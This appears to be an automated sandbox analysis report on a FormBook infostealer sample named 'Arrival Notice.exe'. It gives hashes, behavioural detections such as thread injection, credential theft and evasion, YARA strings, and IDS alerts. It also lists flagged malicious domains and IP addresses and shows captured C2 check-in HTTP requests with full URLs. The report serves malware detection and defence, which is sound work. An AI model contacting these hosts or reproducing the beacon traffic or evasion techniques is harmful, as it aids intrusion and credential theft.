
Windows Analysis Report
Arrival Notice.exe

Overview

General Information

Sample name: Arrival Notice.exe
Analysis ID: 1494709
MD5: f94ffbea567a61ade8409b8a854d6562
SHA1: cd0e9b9c21111af31bb59d416e6edf49eb8aaf3e
SHA256: f0cd4c3441a54c8b9f0d7aa5ba5066014d8eaefe9ddf6b87906354e043b627b5
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Arrival Notice.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: F94FFBEA567A61ADE8409B8A854D6562)
    • svchost.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IprrrFQGqOjAyLqOuuogohDyaEetb.exe (PID: 1516 cmdline: "C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7092 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • IprrrFQGqOjAyLqOuuogohDyaEetb.exe (PID: 4544 cmdline: "C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1700 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.exe, ParentProcessId: 6980, ParentProcessName: Arrival Notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ProcessId: 7084, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.exe, ParentProcessId: 6980, ParentProcessName: Arrival Notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ProcessId: 7084, ProcessName: svchost.exe
Timestamp | SID | Severity | Source Port | Destination Port | Protocol | Classtype
2024-08-19T04:29:45.770188+0200 | 2855464 | 1 | 61909 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:15.619235+0200 | 2855464 | 1 | 49742 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:26:45.953305+0200 | 2855464 | 1 | 49737 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:43.220807+0200 | 2855464 | 1 | 61908 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:59.083931+0200 | 2050745 | 1 | 61898 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:25:50.548648+0200 | 2050745 | 1 | 61910 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:26:51.139925+0200 | 2855464 | 1 | 49739 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:08.800729+0200 | 2855464 | 1 | 61889 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:26:30.209134+0200 | 2050745 | 1 | 49736 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:28:45.803748+0200 | 2050745 | 1 | 61894 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:28:03.640634+0200 | 2855464 | 1 | 61887 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:18.166411+0200 | 2855464 | 1 | 49743 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:23.394049+0200 | 2855464 | 1 | 61893 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:18.369749+0200 | 2855464 | 1 | 61903 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:26:48.524707+0200 | 2855464 | 1 | 49738 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:26.074038+0200 | 2050745 | 1 | 61906 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:29:12.619341+0200 | 2050745 | 1 | 61902 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:26:53.621214+0200 | 2050745 | 1 | 49741 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:28:20.846261+0200 | 2855464 | 1 | 61892 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:56.555569+0200 | 2855464 | 1 | 61897 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:06.168191+0200 | 2855464 | 1 | 61888 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:53.995546+0200 | 2855464 | 1 | 61896 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:46.320412+0200 | 2855464 | 1 | 61885 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:11.205183+0200 | 2050745 | 1 | 61890 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:29:23.565167+0200 | 2855464 | 1 | 61905 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:40.691998+0200 | 2855464 | 1 | 61907 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:41.892608+0200 | 2855464 | 1 | 61883 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:51.482298+0200 | 2855464 | 1 | 61895 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:20.693670+0200 | 2855464 | 1 | 49744 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:24.986327+0200 | 2050745 | 1 | 49745 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:27:57.855403+0200 | 2050745 | 1 | 61886 | 80 | TCP | Malware Command and Control Activity Detected
2024-08-19T04:29:07.504399+0200 | 2855464 | 1 | 61900 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:10.035756+0200 | 2855464 | 1 | 61901 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:27:44.424571+0200 | 2855464 | 1 | 61884 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:04.930341+0200 | 2855464 | 1 | 61899 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:28:18.314367+0200 | 2855464 | 1 | 61891 | 80 | TCP | A Network Trojan was detected
2024-08-19T04:29:20.919756+0200 | 2855464 | 1 | 61904 | 80 | TCP | A Network Trojan was detected


            AV Detection

Source: http://www.sandranoll.com/aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= | Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/ | Avira URL Cloud: Label: malware
Source: http://www.gipsytroya.com/tf44/ | Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/ | Avira URL Cloud: Label: malware
Source: http://www.gipsytroya.com/tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 | Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 | Avira URL Cloud: Label: malware
Source: www.sandranoll.com | Virustotal: Detection: 10%
Source: www.anuts.top | Virustotal: Detection: 7%
Source: http://www.gipsytroya.com/tf44/ | Virustotal: Detection: 7%
Source: Arrival Notice.exe | ReversingLabs: Detection: 36%
Source: Arrival Notice.exe | Virustotal: Detection: 27%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Arrival Notice.exe | Joe Sandbox ML: detected
Source: Arrival Notice.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1783713149.000000000098E000.00000002.00000001.01000000.00000004.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4134616336.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0041DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0041DBBE
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_004268EE FindFirstFileW,FindClose,0_2_004268EE
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0042698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0042698F
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0041D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0041D076
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0041D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0041D3A9
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00429642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00429642
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0042979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0042979D
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00429B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00429B2B
Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00425C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00425C97
Source: C:\Windows\SysWOW64\clip.exe | Code function: 3_2_02F8BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_02F8BC20
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then xor eax, eax 3_2_02F79870
Source: C:\Windows\SysWOW64\clip.exe | Code function: 4x nop then mov ebx, 00000004h 3_2_04F0053E

            Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61884 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61895 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61883 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61888 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61893 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61900 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61891 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 5.44.111.162:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61886 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61887 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61890 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61902 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61906 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61901 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61896 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61892 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61894 -> 23.251.54.212:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61899 -> 213.145.228.16:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61885 -> 43.252.167.188:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61904 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.160.0.106:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61898 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61897 -> 199.192.19.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61907 -> 104.21.45.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61908 -> 104.21.45.56:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61903 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61905 -> 91.195.240.19:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61889 -> 194.9.94.85:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61909 -> 104.21.45.56:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61910 -> 104.21.45.56:80
            Source: Joe Sandbox View | IP Address: 23.251.54.212
            Source: Joe Sandbox View | IP Address: 213.145.228.16
            Source: Joe Sandbox View | ASN Name: VPSQUANUS
            Source: Joe Sandbox View | ASN Name: DOMAINTECHNIKAT
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View | ASN Name: LOOPIASE
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0042CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0042CE44
            Source: global traffic | HTTP traffic detected:
                GET /w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.hprlz.cz
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.catherineviskadi.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.bfiworkerscomp.com
                Connection: close
